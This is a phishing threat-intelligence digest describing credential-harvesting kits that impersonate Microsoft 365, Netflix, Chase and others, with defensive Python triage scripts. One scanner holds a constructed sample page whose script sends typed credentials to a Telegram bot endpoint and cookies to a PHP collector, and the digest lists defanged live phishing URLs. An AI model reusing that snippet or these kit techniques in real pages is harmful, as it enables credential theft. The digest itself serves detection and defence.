
Phish Wire - December 22, 2025

Between December 06 and December 18, 2025, analysts reviewed a set of multi-stage credential-harvesting pages that primarily impersonated Microsoft Azure/Office 365 sign-in, with additional lures for Netflix, Chase Bank, Adobe Cloud, Paperless Post and OneDrive. Recurring techniques included JavaScript-based exfiltration via AJAX and fetch() requests to same-host PHP collectors and to external APIs (notably Telegram bot endpoints), obfuscated code with base64-encoded configuration, second-stage forms that collect one-time passcodes while they are still valid so the operator can complete the real sign-in (this defeats SMS and app-code MFA, though it is a relay rather than a bypass of the factor itself), and anti-analysis measures such as browser fingerprinting, IP geolocation checks, disabled text selection and right-click, and clipboard manipulation.

Operators leaned on legitimate infrastructure throughout: pages hosted on compromised business domains and on Backblaze B2 storage, Cloudflare in front of several sites, and genuine Microsoft CDN, jQuery and Bootstrap assets loaded to make the pages look authentic and blend into normal traffic. One Google Translate proxy URL was also reviewed and turned out to be a benign site rather than a phishing page (see the AccuRadio entry below); the pattern still deserves scrutiny because the same proxy can front a malicious page under a Google-owned hostname. Social engineering features included real-time UI transitions that mimic the staged Microsoft sign-in, a forced "incorrect password" response to the first attempt so the victim retypes the credential, honeypot fields for bot detection, and personalization pulled from URL parameters. Taken together, the set shows movement toward proxy-based interception and broader victim profiling: browser fingerprinting, cookie harvesting and full simulation of enterprise authentication flows rather than a single static form.

Domains Reviewed

  • hiitecocom[.]hiiteco[.]com/?HjjWv=zzAoSXI&gZTuMkY=4211aa3dcef343799f1c5b... (2 variants)
  • theacademygroup[.]philaports[.]co/FlEs-ViEw-mkPB8GC4vd-BuWla3F78CWbMPAEs...
  • ane[.]za[.]com/AN/
  • f005[.]backblazeb2[.]com/file/sharefileone/onedr-updated[.]html
  • elgatobypasses[.]org/fr-en/login?serverState=%7B%22realm%22%3A%22growth%...
  • www[.]competenle[.]de/piza/invitation/
  • ajey-sqm[.]com/common?key=rr11tzhgh
  • philfe[.]reuneioninc[.]company/W3iPj4x52hxm4JWwNoa8zJVHlmNo2dSiEaIxOIDUs...
  • securechasecomwebauth[.]ea0secure[.]es/login
  • www-accuradio-com[.]translate[.]goog/?_x_tr_sl=fr&_x_tr_tl=en&_x_tr_hl=e...
  • mapbox[.]cipedre[.]solutions/y31frx3az4xlxx?3d871a864c43c7ce1-1343c11eb4...

On December 16, 2025, an employee at a Washington organization clicked the below phishing page.

This page captures credentials with a standard HTML form POST to "https://hiitecocom.hiiteco.com/common/login", the same path the genuine Microsoft form posts to on login.microsoftonline.com, while impersonating the Azure/Office 365 sign-in page with cloned CSS, JavaScript and client telemetry code. Notable TTPs include obfuscated JavaScript with encoded configuration data, browser fingerprinting, region-dependent content loaded from multiple CDN endpoints, and nonce attributes on script tags plus error-handling code that complicate debugging (both most likely carried over from the genuine page rather than purpose-built anti-analysis).

The hosting domain "hiiteco.com" carries multiple subdomains styled after Microsoft service names, and the page ships the genuine page's WebAuthn/FIDO2 and desktop-SSO client code along with its telemetry collection. The cloned WebAuthn code is cosmetic: a FIDO2 assertion is bound to the relying party's origin, so a key registered with Microsoft cannot be used to sign in from hiiteco.com, which is exactly why passkeys resist this class of attack while passwords and OTP codes typed into the page do not. The operation is well beyond a basic credential harvester; it reproduces the enterprise sign-in experience closely enough to be convincing to most users.

Additional similar attacks were clicked:

  • hiitecocom[.]hiiteco[.]com/?HjjWv=zzAoSXI&gZTuMkY=45a08dfaa57a4ff1876e359686fa8262&sso_reload=true

On December 16, 2025, an employee at an Illinois organization clicked the below phishing page.

This page exfiltrates credentials with JavaScript loaded from external script files (iPCot8cvRm83Bjw.js, eRG8LLZOwPVnAZvu.js, H0qjFgJDWKNbBGDFbDW.js) rather than a form submission. Collection is staged to mirror the Microsoft sign-in: username, then password, then an MFA code or SMS verification. Evasion techniques include randomized CSS class names, honeypot fields to detect bots, disabled text selection and right-click, and base64-encoded configuration blobs (var_params_701, var_settings_365) that hide the kit's settings from casual inspection.

Notable features include real-time UI transitions between stages, a simulated Microsoft Authenticator prompt with animated elements and a randomly generated number, and global user-select and pointer-events manipulation to frustrate inspection. The kit is hosted on what appears to be a compromised legitimate domain (philaports.co) behind Cloudflare. Because the OTP or Authenticator response is collected live, the operator can complete a real sign-in before the code expires; this defeats SMS and app-code MFA but not phishing-resistant methods such as FIDO2.

On December 16, 2025, an employee at a Virginia organization clicked the below phishing page.

This page combines a form POST to "next.php" with jQuery AJAX submissions, then moves to a second stage that collects an OTP and posts it to "Analysis405/otp_process.php". The lure impersonates Adobe Cloud document sharing and offers several email-provider sign-in options (Outlook, AOL, Office365, Yahoo) to cast a wide net. A retry step rejects the first submission so the victim re-enters credentials, and additional fetch() calls to "collector.php" ship browser fingerprint data, cookies and device information.

The site sits behind Cloudflare (the beacon script and challenge-platform references are present) and loads jQuery and Bootstrap from public CDNs. OTP codes are requested in a convincing modal; because they are relayed to the operator while still valid, this stage defeats one-time-code MFA. Multi-stage collection, live validation of the submitted credential (as the retry behavior suggests) and victim profiling place the kit at the advanced end of what was observed this period.

On December 15, 2025, an employee at a Kentucky organization clicked the below phishing page.

This OneDrive-themed page collects email and password in a fake Microsoft form and exfiltrates them with fetch() requests to a Telegram bot API endpoint (https://api.telegram.org/bot). The JavaScript is obfuscated (encoded function names, hex-encoded strings), looks up the victim's IP geolocation before submitting, and is hosted as a static HTML file on Backblaze B2, a legitimate storage service, with OneDrive styling and logos. The bot token embedded in such a page is a reusable indicator: it is a static secret unless the operator revokes it, so it can tie together otherwise unrelated pages and is worth reporting to Telegram as well as blocking.

Sophistication is moderate to advanced: staged collection (geolocation first, then credentials), obfuscation that slows analysis, and the use of Telegram's API as the exfiltration channel, which rides TLS to a widely allowed domain rather than a form POST to attacker-controlled infrastructure. Error handling and retry logic around the submission point to a maintained kit rather than a one-off template.

On December 15, 2025, an employee at a Texas organization clicked the below phishing page.

This is not a cloned page but a web proxy: "elgatobypasses.org" fetches Netflix's real login page and rewrites it so that it renders from the proxy's own domain (the base href is pointed at the genuine Netflix login while the address bar keeps the proxy hostname). The rewriting framework uses base64-encoded components (a "__Cpn" object) and tags rewritten elements with "__cpp" attributes; origin-trial tokens copied from the Netflix page appear in the output, but such tokens are bound to the origin they were issued for and have no effect on the proxy domain. Because every request and response, including the credential POST, passes through the proxy, the operator can read credentials and session cookies in transit without any custom form handling. Whether this site was built as a phishing page or is a general-purpose filter-bypass proxy that was used for a Netflix login, the effect for the user is the same: anything typed into a proxied page is exposed to the proxy operator.

On December 15, 2025, an employee at a Minnesota organization clicked the below phishing page.

This page submits credentials via AJAX POST to "processmail.php", then presents a second form that collects an OTP code and posts it to "process.php". The lure impersonates a Paperless Post invitation: the inviter's name is read from a URL parameter and rendered with an animated typing effect, and the sign-in offers Outlook, Office365, Yahoo, Gmail and AOL options. The first submission is always answered with "Incorrect Password" so the victim retypes the credential (giving the operator a second sample to confirm it), after which a fake OTP prompt with a countdown timer collects the second factor. The JavaScript suppresses the real form submission and exfiltrates the data itself. Sophistication is moderate, but the flow is sufficient to capture both the password and a live 2FA code.

On December 10, 2025, an employee at a Kentucky organization clicked the below phishing page.

This page uses a standard form POST to "/common/login" for the initial credential capture, dressed as an Azure AD sign-in. It loads genuine Microsoft assets from aadcdn.msauth.net, reproduces the OAuth/OpenID Connect query parameters of a real authorize request, and reuses Microsoft branding and CSS, so the rendered page is a near-exact replica. Supporting endpoints that the genuine page would call on Microsoft domains are rewritten to point back at the malicious "ajey-sqm.com" host, which appears to be a compromised domain. The faithful reproduction of the sign-in flow and the handling of OAuth parameters are what make the page advanced; whether it goes beyond password capture to token or session theft cannot be determined from the captured HTML alone, since that would require a live server-side relay to Microsoft rather than the static form observed here.

On December 10, 2025, an employee at a Kentucky organization clicked the below phishing page.

This page uses a basic HTML form submission for credential capture, with the form most likely POSTing to a backend script on the same compromised domain (reuneioninc.company). Evasion techniques include randomized CSS class names (a_item_940, a_panel_934), an off-screen honeypot field (class a_container_123) to detect automated form fillers, and disabled text selection and right-click to hinder analysis.

The host appears to be a compromised legitimate business domain rather than a disposable one. The page closely mimics the Office 365 sign-in with proper branding, loading animations and a multi-step flow. Sophistication is moderate: anti-bot measures and a polished UI, but classic form submission rather than JavaScript exfiltration. jQuery is loaded from a public CDN, and references to PageConfig and PageValidator identifiers suggest this page is one template from a larger phishing kit.

On December 09, 2025, an employee at an Illinois organization clicked the below phishing page.

This page captures credentials with a standard HTML form POST to the same malicious host, "https://securechasecomwebauth.ea0secure.es/login", including a CSRF token field, which shows the kit maintains server-side sessions like a real application. It impersonates Chase Bank with authentic-looking CSS, logos and footer links, and a hidden security-token field suggests a stage for collecting a second factor.

The host uses a Spanish ".es" domain with the deceptive subdomain "securechasecomwebauth", built to read as "secure chase.com web auth" to a casual observer, and sits behind Cloudflare (the Cloudflare Insights beacon is present). Sophistication is moderate: a jQuery password-visibility toggle, form validation and detailed brand replication, but no geofencing and no JavaScript-based exfiltration.

On December 09, 2025, an employee at an Illinois organization clicked the below phishing page.

This is the legitimate AccuRadio site viewed through Google Translate, not a phishing page: the hostname www-accuradio-com.translate.goog is Google's encoding of www.accuradio.com, and the content carries AccuRadio's own branding and its normal analytics and advertising stack (Facebook Pixel, Google Tag Manager, Amazon and CPMStar ad tags, a consent-management framework). There is no credential form, no exfiltration script and no social-engineering content; the application is a React-based streaming front end using standard CDNs and a valid TLS certificate for the translate.goog host. The click is a false positive, most likely flagged on the unusual Google Translate proxy hostname rather than on anything malicious. Translate proxies still merit review, because the same mechanism can front a phishing page under a Google-owned hostname, but this instance was benign.
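
Two of the hostname patterns in this digest can be checked mechanically: brand and trust words stuffed into a subdomain under an unrelated registrable domain (securechasecomwebauth.ea0secure.es, mapbox.cipedre.solutions), and Google Translate proxy hostnames, which encode the proxied origin in the leftmost label by replacing dots with hyphens and a literal hyphen with a double hyphen, so www-accuradio-com.translate.goog decodes to www.accuradio.com. The following Python helper is an added example written for this digest, not tooling from the original analysis; its keyword lists, allowlist and two-label registrable-domain shortcut are assumptions (use a public-suffix-list library such as tldextract for production).

```python
"""Hostname triage for lookalike and proxy phishing URLs.

Added example for this digest, not tooling from the original analysis. The keyword
lists, the allowlist and the registrable-domain shortcut are assumptions.
"""
from urllib.parse import urlsplit

# Assumed lists: extend with the brands and SaaS hosts your organisation actually uses.
BRANDS = ("microsoft", "office", "onedrive", "sharepoint", "azure", "netflix",
          "chase", "adobe", "paypal", "mapbox", "dropbox", "docusign")
TRUST_WORDS = ("secure", "login", "signin", "auth", "verify", "account")
# The brands' own domains must be allowlisted or login.microsoftonline.com would fire.
KNOWN_GOOD = ("microsoftonline.com", "microsoft.com", "live.com", "netflix.com",
              "chase.com", "adobe.com", "paypal.com", "mapbox.com")
FILE_HOSTS = ("backblazeb2.com", "web.core.windows.net", "s3.amazonaws.com",
              "r2.dev", "pages.dev", "web.app", "firebaseapp.com")
# Simplification: everything is "label.tld" except these two-part public suffixes.
TWO_PART_SUFFIXES = ("co.uk", "com.au", "co.jp", "com.br", "co.za", "org.uk")


def split_host(host):
    """Return (subdomain_labels, registrable_domain) for a hostname."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_PART_SUFFIXES:
        return labels[:-3], ".".join(labels[-3:])
    return labels[:-2], ".".join(labels[-2:])


def decode_translate_proxy(host):
    """Recover the origin behind a *.translate.goog hostname, or None if it is not one.

    Google encodes the proxied host in the leftmost label: '.' becomes '-' and a
    literal '-' becomes '--' (www-accuradio-com -> www.accuradio.com).
    """
    sub, reg = split_host(host)
    if reg != "translate.goog" or not sub:
        return None
    marker = "\x00"  # stand-in so '--' survives the '-' -> '.' pass
    return sub[0].replace("--", marker).replace("-", ".").replace(marker, "-")


def triage_host(url_or_host):
    """Return the effective host, its registrable domain and a list of findings."""
    target = url_or_host if "//" in url_or_host else "//" + url_or_host
    host = (urlsplit(target).hostname or "").lower()
    findings = []

    proxied = decode_translate_proxy(host)
    if proxied:
        findings.append(f"translate.goog proxy for {proxied}")
        host = proxied  # judge the real origin, not Google's wrapper

    sub, reg = split_host(host)
    if reg in KNOWN_GOOD:
        return {"host": host, "registrable": reg, "findings": findings}

    sub_text = ".".join(sub)
    sld = reg.split(".")[0]
    brands_in_sub = [b for b in BRANDS if b in sub_text]
    if brands_in_sub:
        findings.append(f"brand keyword(s) {brands_in_sub} in subdomain of {reg}")
    trust = [w for w in TRUST_WORDS if w in host]
    if trust and (brands_in_sub or any(b in sld for b in BRANDS)):
        findings.append(f"trust word(s) {trust} combined with a brand name")
    # hiitecocom.hiiteco.com: the subdomain is the registrable domain with its dot removed
    if sub and sub[0] == reg.replace(".", ""):
        findings.append(f"subdomain echoes registrable domain {reg} with dots removed")
    if reg in FILE_HOSTS or host.endswith(tuple("." + h for h in FILE_HOSTS)):
        findings.append("page served from a public file-hosting origin")
    return {"host": host, "registrable": reg, "findings": findings}


if __name__ == "__main__":
    for u in ("https://securechasecomwebauth.ea0secure.es/login",
              "https://www-accuradio-com.translate.goog/?_x_tr_sl=fr",
              "hiitecocom.hiiteco.com", "f005.backblazeb2.com",
              "mapbox.cipedre.solutions", "login.microsoftonline.com"):
        print(triage_host(u))
```

The translate.goog decode is deliberately applied before the other checks so that a proxied phishing page is judged on the origin it fronts, while a proxied legitimate site (the AccuRadio case) produces only the informational proxy finding. The file-hosting check is informational as well: Backblaze B2 and similar buckets host plenty of benign content, but a sign-in page served from one is almost never legitimate.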

On December 08, 2025, an employee at a Kentucky organization clicked the below phishing page.

This page drives credential exfiltration from heavily obfuscated JavaScript held in a variable "li" (base64 or a custom encoding) and hijacks the clipboard: copy events are intercepted and the clipboard content is replaced with the single letter "c", which stops an analyst from copying the source or URL out of the browser. Hidden elements display bogus progress messages ("Applying dynamic environment settings. Core modules are being tuned for optimal performance") while the decoded script presumably performs the collection and transmission. The page also contains GoGuardian references; GoGuardian is a school endpoint-monitoring product that injects its own scripts into pages, so these are most likely artifacts of the device that captured the page rather than part of the kit and should not be used as an indicator. The host (mapbox.cipedre.solutions) uses an unusually long URL path with encoded parameters. The combination of heavy obfuscation, anti-copy behavior and a fully encoded payload makes static analysis slow; decoding the "li" payload in a sandboxed JavaScript interpreter is the practical next step for this one.
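
The exfiltration and anti-analysis tricks described across these entries (Telegram bot API calls, fetch()/AJAX posts to PHP collectors, IP geolocation lookups, base64 blobs fed to atob(), clipboard hijacking, disabled selection and right-click, off-screen honeypot inputs, and the proxy pattern of a <base href> pointing at another origin) can be triaged statically from the captured HTML before anyone decodes the payload. The following Python scanner is an added example written for this digest, not code from any of the kits or from the original analysis; the indicator regexes and weights are hand-tuned assumptions rather than published signatures, and SAMPLE_HTML is a constructed composite loosely modelled on the pages above, not a real capture.

```python
"""Static triage of a captured phishing page (HTML with inline JavaScript).

Added example for this digest, not code from any kit or from the original analysis.
The indicator regexes, the weights and SAMPLE_HTML are hand-built assumptions.
"""
import json
import re
from urllib.parse import urlsplit

# (name, pattern, weight). Weights rank pages for an analyst; they are not a verdict.
INDICATORS = [
    ("telegram_bot_api", re.compile(r"api\.telegram\.org/bot\d+:[\w-]+", re.I), 5),
    # fetch()/jQuery/XHR calls whose URL argument ends in .php (same-host collectors)
    ("php_collector", re.compile(r"(?:fetch|\$\.ajax|\$\.post|\.open)\s*\([^;]*?['\"]([^'\"]+\.php)['\"]", re.I), 3),
    ("ip_geolocation", re.compile(r"ipapi\.co|ip-api\.com|ipinfo\.io|ipify\.org|geolocation-db\.com", re.I), 2),
    # atob() calls or long unbroken base64 runs holding encoded config or payloads
    ("base64_blob", re.compile(r"atob\s*\(|[A-Za-z0-9+/]{200,}={0,2}"), 2),
    ("clipboard_hijack", re.compile(r"clipboardData\.setData|addEventListener\s*\(\s*['\"]copy['\"]|oncopy\s*=", re.I), 3),
    ("context_menu_disabled", re.compile(r"oncontextmenu\s*=|['\"]contextmenu['\"]", re.I), 1),
    ("selection_disabled", re.compile(r"user-select\s*:\s*none|onselectstart\s*=", re.I), 1),
    # an <input> pushed far off-screen: the honeypot that bots fill and humans never see
    ("offscreen_honeypot", re.compile(r"<input[^>]*(?:left|top)\s*:\s*-\d{3,}px", re.I), 2),
    ("otp_stage", re.compile(r"\b(?:otp|verification\s+code|authenticator)\b", re.I), 1),
]


def foreign_base_href(html, page_url):
    """Return the <base href> host if it differs from the page's own host, else None.

    A page served from one origin that bases every relative URL on another is the
    signature of the proxy/rewriting pattern seen on the Netflix page above.
    """
    m = re.search(r"<base\s+[^>]*href\s*=\s*['\"]([^'\"]+)['\"]", html, re.I)
    if not m:
        return None
    base_host = (urlsplit(m.group(1)).hostname or "").lower()
    page_host = (urlsplit(page_url).hostname or "").lower()
    return base_host if base_host and page_host and base_host != page_host else None


def form_targets(html):
    """Collect <form action=...> targets (the classic POST exfiltration path)."""
    return re.findall(r"<form\b[^>]*\baction\s*=\s*['\"]([^'\"]*)['\"]", html, re.I)


def triage_page(html, page_url):
    """Score a captured page and return the indicators that fired."""
    hits, score = {}, 0
    for name, rx, weight in INDICATORS:
        count = len(rx.findall(html))
        if count:
            hits[name] = count
            score += weight
    base = foreign_base_href(html, page_url)
    if base:
        hits["foreign_base_href"] = base
        score += 4
    actions = form_targets(html)
    if actions:
        hits["form_actions"] = actions
    verdict = "likely phishing kit" if score >= 5 else "inconclusive"
    return {"score": score, "verdict": verdict, "hits": hits}


# Constructed sample (never executed as JavaScript), not a real capture: it combines the
# OneDrive/Telegram, Adobe/collector.php, clipboard and proxy behaviours described above.
SAMPLE_HTML = """<html><head><style>body{user-select:none}</style>
<base href="https://www.netflix.com/">
</head><body oncontextmenu="return false">
<form id="f" action="next.php" method="post">
<input type="text" name="website" style="position:absolute;left:-9999px" tabindex="-1">
<input name="email"><input name="password" type="password"></form>
<script>
document.addEventListener('copy', e => { e.clipboardData.setData('text/plain', 'c'); e.preventDefault(); });
fetch('https://ipapi.co/json/').then(r => r.json()).then(geo => {
  fetch('https://api.telegram.org/bot000000:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sendMessage', {
    method: 'POST', body: JSON.stringify({chat_id: 0, text: email + ':' + password + ' ' + geo.country})
  });
  fetch('collector.php', {method: 'POST', body: document.cookie});
});
var cfg = atob('aHR0cHM6Ly9leGFtcGxlLmludmFsaWQ=');
</script></body></html>"""


def demo():
    """Run the scanner over the constructed sample as if captured from a B2 bucket URL."""
    return triage_page(SAMPLE_HTML, "https://f005.backblazeb2.com/file/example/page.html")


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run it over the saved HTML of a reported page before spending time deobfuscating: a page that fires the Telegram, clipboard or foreign-base-href indicators is worth escalating regardless of how the decoded payload looks, and the recovered bot token or collector path is the indicator to block and hunt on.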

Recommendations

  • Use DNS filtering to block newly registered domains and lookalike subdomain patterns, in particular hostnames that combine Microsoft, Azure or Office 365 terms with an unrelated registrable domain.
  • Flag inbound external mail whose links point at file-sharing or cloud-storage origins (Backblaze B2, object-storage buckets, static-site hosts), and warn on Google Translate proxy URLs (*.translate.goog), decoding the proxied origin for the reviewer rather than blocking outright, since legitimate translations produce the same hostname pattern.
  • Configure web proxy and URL filtering to catch deceptive naming conventions, such as "secure", "login" or "webauth" combined with a brand name in the subdomain of a domain the brand does not own.
  • Alert on sign-in patterns that match these kits, such as a failed password followed immediately by an MFA prompt from a new device or location, and require device compliance through conditional access. Where possible, move users to phishing-resistant MFA (FIDO2 security keys or passkeys): every OTP and Authenticator-prompt stage described above can be relayed by the operator in real time, but a WebAuthn assertion is bound to the genuine origin and cannot be replayed from a lookalike domain.
  • Train users on multi-stage phishing that reproduces the full sign-in flow, including the "incorrect password, try again" retry and a follow-up OTP prompt, so that a sudden second factor request after an unexpected sign-in page is treated as a red flag rather than reassurance.
  • Treat pages that disable text selection, right-click or clipboard copying as suspect in URL sandbox analysis and browser-isolation tooling; blocking "obfuscated JavaScript" generically at the endpoint is not a reliable control, so put this detection in the proxy or detonation layer where the page source is available.
  • Restrict egress to exfiltration channels that have no business use, such as api.telegram.org, and monitor for browser POSTs to bare PHP endpoints on uncategorised domains; a Telegram bot token recovered from a page is a high-fidelity indicator for hunting related activity.